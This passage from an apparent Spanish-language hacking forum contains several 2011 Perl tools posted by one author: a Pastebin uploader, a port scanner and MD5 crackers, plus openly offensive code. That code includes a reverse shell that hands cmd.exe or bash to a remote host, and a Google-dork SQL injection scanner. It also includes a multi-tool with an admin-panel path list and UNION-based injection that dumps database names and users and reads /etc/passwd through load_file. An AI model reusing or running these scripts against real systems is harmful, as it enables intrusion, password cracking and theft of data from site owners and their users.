print "\n[+] Decoded : ".$1."\n\n";
}
}
}
print "\n[+] Finish\n"; 
}
 
sub head {
print "\n\n-- == Pass Cracker == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
 
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

Ejemplo de uso

Código:

perl crack.pl <hash>

385

Programación / Scripting / [Perl] PasteBin Uploader

en: 8 Octubre 2011, 16:55 pm

Bueno aca eh terminado un programa que los ayudara a publicar sus programas
en pastebin de una forma rapida y sin ganas xDDD

Entonces , este programa tiene dos opciones :

Publica solo un archivo
Publica todos los archivos en un directorio

Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo

Código

#!usr/bin/perl
#Paste Bin Uploader (C) Doddy Hackman 2011
 
use LWP::UserAgent;
use HTTP::Request::Common;	
 
my $nave = LWP::UserAgent->new();
$nave->timeout(10);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
 
menu();
 
sub menu {
 
clean();
header();
 
print "\n\n[Options]\n\n";
print "[1] : Upload a file\n";
print "[2] : Upload a directory\n";
print "[3] : Exit\n\n";
print "[Option] : ";
chomp(my $op = <stdin>);
 
if ($op eq 1) {
print "\n\n[File] : ";
chomp(my $file = <stdin>);
 
if (-f $file)  {
 
($name,$exta) =verfile($file);
 
my $ext = extensiones($exta);
 
if ($ext ne "Yet") {
 
 
$code = openfile($file);
 
$re = lleva($name,$code,$ext);
 
print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";
 
savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);
 
}
 
 
} else {
print "\n\n[-] Error\n\n";
}
reload();
}
 
elsif ($op eq 2) {
 
print "\n\n[Directory] : ";
chomp(my $dir = <stdin>);
 
if (-d $dir) {
 
my @files = verdir($dir);
 
print "\n\n[+] Loading directory\n";
 
for my $file(@files) {
 
chomp $file;
 
my ($name,$exta) =verfile($file);
 
my $ext = extensiones($exta);
 
if ($ext ne "Yet") {
 
my $code = openfile($dir."/".$file);
 
$re = lleva($name,$code,$ext);
 
print "\n\n[+] File : $file\n";
print "[+] Link : ".$re."\n";
 
savefile("uploads_paste.txt","\n[+] File : $file");
savefile("uploads_paste.txt","[+] Link : ".$re);
 
}
}
} else {
print "\n\n[-] Error\n\n";
}
 
reload();
}
 
elsif ($op eq 3) {
copyright();
<stdin>;
exit(1);
}
 
else {
menu();
}
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
}
 
sub header {
 
print q(
 
 PPPP     AA     SSSSTTTTTTEEEE    BBBB   II NN   NN     UU  UU  PPPP 
 PP PP    AA    SS  S  TT  EE      BB BB  II NNN  NN     UU  UU  PP PP
 PP PP   AAAA   SS     TT  EE      BB BB  II NNNN NN     UU  UU  PP PP
 PPPP    A  A    SSS   TT  EEEE    BBBB   II NN N NN     UU  UU  PPPP 
 PP     AAAAAA     SS  TT  EE      BB BB  II NN NNNN     UU  UU  PP   
 PP     AA  AA  S  SS  TT  EE      BB BB  II NN  NNN     UUUUUU  PP   
 PP     AA  AA  SSSS   TT  EEEE    BBBB   II NN   NN      UUUU   PP   
 
 
);
 
}
 
sub clean {
system("cls");
}
 
 
 
sub verdir{
my @archivos;
opendir DIR,$_[0];
my @archivos = readdir DIR;
for (@archivos) {
if (-f $_[0]."/".$_) {
push(@files,$_)
}
}
return @files;
}
 
sub verfile {
if ($_[0]=~/(.*)\.(.*)/ig) {
return ($1,$2);
}
}
 
sub extensiones {
 
if ($_[0] =~/py/ig) {
$code  = "python";
}
elsif ($_[0] =~/pl/ig) {
$code = "perl";
}
elsif ($_[0] =~/rb/ig) {
$code = "ruby";
}
elsif ($_[0] =~/php/ig) {
$code = "php";
}
elsif ($_[0] =~/txt/ig) {
$code = "";
}
else {
$code = "Yet";
}
return $code;
}
 
sub reload {
print "\n\n[?] Enter for continue\n\n";
<stdin>;
menu();
}
 
 
 
sub savefile {
open (SAVE,">>logs/".$_[0]);
print SAVE $_[1]."\n";
close SAVE; 
}
 
sub openfile {
 
my $r;
 
open (FILE,$_[0]);
@wor = <FILE>;
close FILE;
for(@wor) {
$r.= $_;
}
return $r;
}
 
sub lleva {
return $nave->post('http://pastebin.com/api_public.php',{ paste_code => $_[1],paste_name=> $_[0],paste_format=>$_[2],paste_expire_date=>'N',paste_private=>"public",submit=>'submit'})->content;
} 
 
# ¿ The End ?

386

Programación / Scripting / [Perl] Reverse Shell By Doddy

en: 8 Octubre 2011, 16:55 pm

Hola a todos.

Hoy traigo un simple reverse shell en esta version solo pueden conectarse al server que tiene netcat
despues ofrece informacion depende del sistema operativo que tiene el que ejecuto el script.
En la version 0.2 le agregare deteccion de kernel y su posible exploit.

Código

#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H
 
use IO::Socket;
 
print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";
 
unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}
 
sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}
 
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("bin/bash");
}
}
 
sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}
 
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}
 
#The End

387

Programación / Scripting / [Perl] Search in google for scan SQLI

en: 7 Octubre 2011, 15:57 pm

Un simple scanner de SQLI para usar en google

Código

#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011
 
use LWP::UserAgent;
use HTML::LinkExtor;
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
 
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;
 
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}
 
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}
 
my @founds = repes(@founds);
 
return @founds; 
}
 
 
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}
 
sub get_links {
 
$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;
 
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}
 
sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}
 
sub head {
print "\n\n-- == Search Google == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}
 
sub toma {
return $nave->get($_[0])->content;
}
 
sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}
 
#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

388

Programación / Scripting / [Perl] Scan Port By Doddy H

en: 7 Octubre 2011, 15:56 pm

HOla a todos aca les traigo un simple scanner de puertos
hecho en perl

Código

#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos
 
use IO::Socket;
 
head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();
 
sub scan {
 
my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);
 
 
print "\n[+] Scanning $_[0]\n\n\n";
 
for my $port(keys %ports) {
 
if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}
 
}
 
sub head {
print "\n\n-- == Scan Port == --\n\n";
}
 
sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

Ejemplo de uso

Código:

perl scan.pl localhost

389

Programación / Scripting / [Perl] Search MD5

en: 7 Octubre 2011, 15:56 pm

Hola a todos

HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk

Código

#Search MD5 
#Version : Tk
#Author : Doddy Hackman
 
 
use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;
 
if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}
 
my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);
 
sub oper{ 
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}
 
sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}
 
sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;
 
my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}
 
MainLoop;

390

Programación / Scripting / [Perl] Stalker By Doddy H

en: 7 Octubre 2011, 15:56 pm

Bueno aca les traigo un programa que eh estado
haciendo esta ultima semana

Se llama stalker , sirve como consola en caso de que cmd.exe no este
disponible y tiene las siguiente funciones

Mostrar IP de servidor especifico
Capturar todos los links de una pagina
Recibir procesos de nuestra maquina
Cerrar el proceso que nos moleste
Conectar a un servidor y mostrar respuesta
Capturar metodos HTTP de un servidor web
Verificar listado de directorios en una pagina
Codificacion y decodificacion de hex/ascii/base64
Escanear puertos de una IP
Buscar panel de administracion
Crackear hash md5 mediante webs
Buscar en google paginas vulnerables a SQLI
Cliente FTP
Navegador por nuestros archivos y directorios
Y ejecutar comandos

Código

#!usr/bin/perl
#Project STALKER (C) Doddy Hackman 2011
#
#ppm install http://www.bribes.org/perl/ppm/DBI.ppd
#ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
#
#You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
#
 
use IO::Socket;	
use HTML::LinkExtor;
use LWP::UserAgent;
use Win32::OLE qw(in);
use Win32::Process;
use Net::FTP;
use Cwd;
use URI::Split qw(uri_split);
use MIME::Base64;
use DBI;
use Color::Output;
Color::Output::Init
 
@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
,'administration/','administration/index.php','administration/login.php'
,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
,'system/login.php','admin.php','login.php','administrador.php','administration.php'
,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
,'administrator/','administrator/index.html','administrator/login.html'
,'administrator/account.html','administrator/account.php','administrator.html','login.html'
,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
,'administrator/login.asp','administrator/account.asp','administrator.asp'
,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
,'server/','database_administration/','power_user/','system_administration/'
,'ss_vms_admin_sm/');
 
 
unless (-d "/logs/webs") {
mkdir("logs/",777);
mkdir("logs/webs/",777);
}
 
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);
 
head();
 
getinfo();
 
$SIG{INT} = \&next;
 
while(1) {
cprint "\x037"; #13
menujo();
cprint "\x030";
}
 
sub getinfo {
$so = $^O;
$login = Win32::LoginName();
$domain = Win32::DomainName();
cprint "\x0313"; #13
print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
cprint "\x030";
}
 
 
sub menujo {
print "\n\n>";
chomp (my $cmd = <stdin>);
print "\n\n";
 
if ($cmd=~/getinfo/ig) {
getinfo();
}
elsif ($cmd =~/getip (.*)/) {
my $te = $1;
if ($te eq "" or $te eq " ") {
print "\n[+] sintax : getip <host>\n";
}
print "\n[IP] : ".getip($1)."\n";
print "\n";
}
 
elsif ($cmd =~/getlink (.*)/) {
print "[+] Extracting links in the page\n\n\n";
$code = toma($1);
my @re = get_links($code);
for my $url(@re) {
chomp $url;
print "[Link] : $url\n";
}
print "\n\n[+] Finish\n";
}
 
elsif ($cmd=~/help/) {
helpme();
}
 
elsif ($cmd=~/getprocess/) {
my %re = getprocess();
 
 
for my $data(keys %re) {
($proceso,$pid) = ($t=~/(.*):(.*)/ig);
print "[+] Proceso : ".$data."\n";
print "[+] PID : ".$re{$data}."\n\n";
}
}
elsif ($cmd=~/killprocess (.*) (.*)/) {
if (killprocess($1,$2)) {
print "[+] Process $1 closed";
}
}
elsif ($cmd=~/conec (.*) (.*) (.*)/) {
print conectar($1,$2,$3);
}
elsif ($cmd=~/allow (.*)/) {
$re = conectar($1,"80","GET / HTTP/1.0\r\n");
if ($re=~/Allow:(.*)/ig) {
print "[+] Metodos : ".$1."\n";
}}
elsif ($cmd=~/paths (.*)/) {
scanpaths($1);
}
elsif ($cmd=~/encodehex (.*)/) {
print "\n\n[+] ".hex_en($1)."\n\n";
}
elsif ($cmd=~/decodehex (.*)/) {
print "\n\n[+] ".hex_de($1)."\n\n";
}
elsif ($cmd=~/download (.*) (.*)/) {
my $file,$name = $1,$2;
if (download($1,$2)) {
print "[+] File downloaded\n";
}
}
elsif ($cmd=~/encodeascii (.*)/) {
print "\n\n[+] ".ascii($1)."\n\n";
}
elsif ($cmd=~/decodeascii (.*)/) {
print "\n\n[+] ".ascii_de($1)."\n\n";
}
elsif ($cmd=~/encodebase (.*)/) {
print "\n\n[+] ".base($1)."\n\n";
}
elsif ($cmd=~/decodebase (.*)/) {
print "\n\n[+] ".base_de($1)."\n\n";
}
elsif ($cmd=~/aboutme/) {
aboutme();
}
elsif ($cmd=~/scanport (.*)/) {
scanport($1);
}
elsif ($cmd=~/panel (.*)/) {
scanpanel($1);
}
elsif ($cmd=~/scangoogle/) {
print "[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
}
elsif ($cmd=~/getpass (.*)/) {
crackit($1);
}
elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
ftp($1,$2,$3);
}
elsif ($cmd=~/navegator/) {
nave:
print getcwd().">";
chomp(my $rta = <stdin>);
print "\n\n";
if ($rta=~/list/) {
my @files = coleccionar(getcwd());
for(@files) {
if (-f $_) {
print "[File] : ".$_."\n";
} else {
print "[Directory] : ".$_."\n";
}}}
if ($rta=~/cd (.*)/) {
my $dir = $1;
if (chdir($dir)) {
print "\n[+] Directory changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/del (.*)/) {
my $file = getcwd()."/".$1;
if (-f $file) {
if (unlink($file)) {
print "\n[+] File Deleted\n";
} else {
print "\n[-] Error\n";
}
} else {
if (rmdir($file)) {
print "\n[+] Directory Deleted\n";
} else {
print "\n[-] Error\n";
}}}
if ($rta=~/rename (.*) (.*)/) {
if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
print "\n[+] File Changed\n";
} else {
print "\n[-] Error\n";
}}
if ($rta=~/open (.*)/) {
my $file = $1;
chomp $file;
system($file);
#system(getcwd()."/".$file);
}
if ($rta=~/help/) {
print "\nCommands : help cd list del rename open exit\n\n";
}
if ($rta=~/exit/) {
next;
}
print "\n\n";
goto nave;
}
elsif ($cmd=~/kobra (.*)/) {
my $url = $1;
chomp $url;
scansqli($url,"--");
}
elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
enter($1,$2,$3);
}
elsif ($cmd=~/exit/) {
copyright();
<stdin>;
exit(1);
}
else {
system($cmd);
}
#print "\n\n";
}
 
 
sub scansqli {
print "[Status] : Scanning.....\n";
$pass = &bypass($_[1]);
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
if ($_[0]=~/hackman/ig) {
savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
&menu_options($_[0],$pass,$save);
}
my ($gen,$save,$control) = &length($_[0],$_[1]);
if ($control eq 1) {
print "[Status] : Enjoy the menu\n\n";
&menu_options($gen,$pass,$save);
} else {
print $control;
print "[Status] : Length columns not found\n\n";
menujo();
}
}
 
sub length {
my $rows  = "0";
my $asc;
my $page = $_[0];
($pass1,$pass2) = &bypass($_[1]);
$inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
$code = toma($inyection);
if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
unless ($testar1 eq $testar2) {
my $patha = $1;
chomp $patha;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..200) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
$control = 1;
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
savefile($save.".txt","\n[Target confirmed] : $page");
savefile($save.".txt","[Bypass] : $_[1]\n");
savefile($save.".txt","[Limit] : The site has $rows columns");
savefile($save.".txt","[Data] : The number @number print data");
if ($patha) {
savefile($save.".txt","[Full Path Discloure] : $patha");
}
$total=~s/$number[0]/hackman/;
savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
}}}}}
 
 
sub details {
my ($page,$bypass,$save) = @_;
($pass1,$pass2) = &bypass($bypass);
savefile($save.".txt","\n");
if ($page=~/(.*)hackman(.*)/ig) {
print "\n\n[+] Searching information..\n\n"; 
my  ($start,$end) = ($1,$2);
$inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
$mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
$test1 = toma($inforschema);
$test2 = toma($mysqluser);
if ($test2=~/ERTOR854/ig) {
savefile($save.".txt","[mysql.user] : ON");
print "[mysql.user] : ON\n";
} else {
print "[mysql.user] : OFF\n";
savefile($save.".txt","[mysql.user] : OFF");
}
if ($test1=~/ERTOR854/ig) {
print "[information_schema.tables] : ON\n";
savefile($save.".txt","[information_schema.tables] : ON");
} else {
print "[information_schema.tables] : OFF\n";
savefile($save.".txt","[information_schema.tables] : OFF");
}
if ($test3=~/ERTOR854/ig) {
print "[+] load_file permite ver los archivos\n";
savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
}
$concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; 
$injection = $start.$concat.$end.$pass2;
$code = toma($injection);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print "\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n\n";
savefile($save.".txt","\n[!] DB Version : $1\n[!] DB Name : $2\n[!] user_name : $3\n");
} else {
print "\n[-] Not found any data\n";
}}}
 
 
sub menu_options {
 
my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
my $save = $auth;
print "\n/logs/webs/$save>";
chomp (my $rta = <stdin>);
 
if ($rta=~/help/) {
print qq(
 
commands : details tables columns dbs othertable othercolumn
           mysqluser dumper logs exit 
 
);
}
 
 
if ($rta =~/tables/) {
schematables($_[0],$_[1],$save);
&reload;	
}
elsif ($rta =~/columns (.*)/) {
my $tabla = $1;
schemacolumns($_[0],$_[1],$save,$tabla);
&reload;
}
elsif ($rta =~/dbs/) {
&schemadb($_[0],$_[1],$save);
&reload;
}
elsif ($rta =~/othertable (.*)/) {
my $data = $1;
&schematablesdb($_[0],$_[1],$data,$save);
&reload;
}
elsif ($rta =~/othercolumn (.*) (.*)/){
my ($db,$table) = ($1,$2);
&schemacolumnsdb($_[0],$_[1],$db,$table,$save);
&reload;
}
elsif ($rta =~/mysqluser/) {
&mysqluser($_[0],$_[1],$save);
&reload;
}
elsif ($rta=~/logs/) {
$t = "logs/webs/$save.txt";
system("start $t");
&reload;
}
elsif ($rta=~/exit/) {
next;
}
 
elsif ($rta=~/dumper (.*) (.*) (.*)/) {
my ($tabla,$col1,$col2) = ($1,$2,$3);
&dump($_[0],$col1,$col2,$tabla,$_[1],$save);
&reload;
}
elsif ($rta =~/details/) {
&details($_[0],$_[1],$save);
&reload;
}
else {
&reload;
}
}
 
 
 
sub schematables {
$real = "1";
my ($page,$bypass,$save) = @_;
savefile($save.".txt","\n");
print "\n";
my $page1 = $page;
($pass1,$pass2) = &bypass($_[1]);
savefile($save.".txt","[DB] : default");
print "\n[+] Searching tables with schema\n\n";
$page =~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),table_name,char(82,65,84,83,88,80,68,79,87,78,49))))/;
$page1=~s/hackman/unhex(hex(concat(char(82,65,84,83,88,80,68,79,87,78,49),Count(*),char(82,65,84,83,88,80,68,79,87,78,49))))/;
$code = toma($page1.$pass1."from".$pass1."information_schema.tables".$pass2);
